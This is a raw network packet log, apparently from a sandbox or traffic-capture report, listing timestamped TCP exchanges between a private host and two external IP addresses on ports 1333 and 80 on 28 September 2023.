                                                                                              Sep 28, 2023 06:01:59.889214039 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889220953 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889262915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889314890 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889350891 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889367104 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889388084 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889409065 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889432907 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889487028 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889535904 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889585018 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889621019 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889636040 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889676094 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889719009 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889755964 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889771938 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889807940 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889823914 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889873981 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889921904 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889957905 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.889974117 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.889995098 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890003920 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890043974 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890069962 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890124083 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890142918 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890180111 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890192032 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890216112 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890229940 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890253067 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890269041 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890305042 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890355110 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890391111 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890414000 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890455961 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890480995 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890516996 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890533924 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890552998 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890563011 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890588999 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890603065 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890625954 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890642881 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890662909 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890676022 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890710115 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890759945 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890810013 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890820980 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890861034 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.890886068 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.890925884 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891007900 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891047955 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891117096 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891155958 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891180038 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891217947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891283989 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891308069 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891325951 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891344070 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891396999 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891437054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891475916 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891489983 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891518116 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891529083 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891541004 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891554117 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891567945 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891592026 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891596079 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891634941 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891729116 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891741991 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891768932 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891783953 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891836882 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891876936 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891902924 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.891942978 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.891968012 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892008066 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892034054 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892074108 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892076969 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892116070 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892142057 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892179966 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892239094 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892280102 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892283916 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892323017 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892395973 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892443895 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892443895 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892482996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892508984 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892549992 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892571926 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892611027 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892631054 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892669916 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892705917 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892719984 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892746925 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892761946 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892796040 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892826080 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892836094 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892865896 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892891884 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892930031 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.892956018 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.892997026 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893023014 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893064022 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893080950 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893135071 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893153906 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893172979 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893218040 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893260002 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893285990 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893328905 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893354893 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893394947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893420935 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893461943 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893488884 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893501997 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893515110 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893527031 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893527985 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893547058 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893564939 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893580914 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893623114 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893644094 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893699884 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893723011 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893738031 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893739939 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893780947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893802881 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893842936 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893860102 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893899918 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.893938065 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.893978119 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894013882 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894028902 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894056082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894083977 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894107103 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894148111 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894150019 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894190073 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894202948 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894242048 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894268036 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894305944 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894326925 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894365072 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894392014 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894435883 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894445896 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894459963 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894481897 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894511938 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894536972 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894562006 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894577026 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894599915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894624949 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894665003 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894690990 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894727945 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894743919 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894782066 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894790888 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894829035 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894867897 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894908905 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894918919 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.894956112 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:01:59.894988060 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:01:59.895025969 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.021200895 CEST804981495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.021488905 CEST4981480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:00.032577991 CEST804981695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.032699108 CEST4981680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:00.032932043 CEST4981680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:00.063575029 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.063685894 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.063996077 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064039946 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064096928 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064131975 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064173937 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064188004 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064188004 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064188957 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064209938 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064229965 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064229965 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064249039 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064259052 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064285040 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064305067 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064323902 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064342022 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064363956 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064378023 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064402103 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064412117 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064439058 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064451933 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064476013 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064490080 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064513922 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064527035 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064553976 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064565897 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064593077 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064610004 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064630985 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064646959 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064682961 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064826965 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064863920 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064882040 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064907074 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.064915895 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.064959049 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.065009117 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.065048933 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.065063000 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.065087080 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.065099001 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.065136909 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.065218925 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.065257072 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.065269947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.065294027 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.065305948 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.065356970 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.065426111 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.065464973 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.065489054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.065500975 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.065517902 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.065555096 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066138983 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066176891 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066204071 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066215038 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066221952 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066252947 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066262960 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066304922 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066323042 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066359997 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066374063 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066400051 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066411972 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066457033 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066461086 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066494942 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066510916 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066531897 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066546917 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066569090 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066581011 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066610098 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.066622019 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066663980 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.066951990 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067013025 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067020893 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067060947 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067073107 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067110062 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067209959 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067249060 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067270994 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067286968 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067306995 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067336082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067361116 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067397118 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067413092 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067435026 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067444086 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067502022 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067612886 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067651033 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067676067 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067687988 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067698956 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067743063 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067759037 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067809105 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067888021 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067924976 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067949057 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.067962885 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.067967892 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.068013906 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.068032026 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.068068981 CEST133349810116.202.2.169192.168.2.3
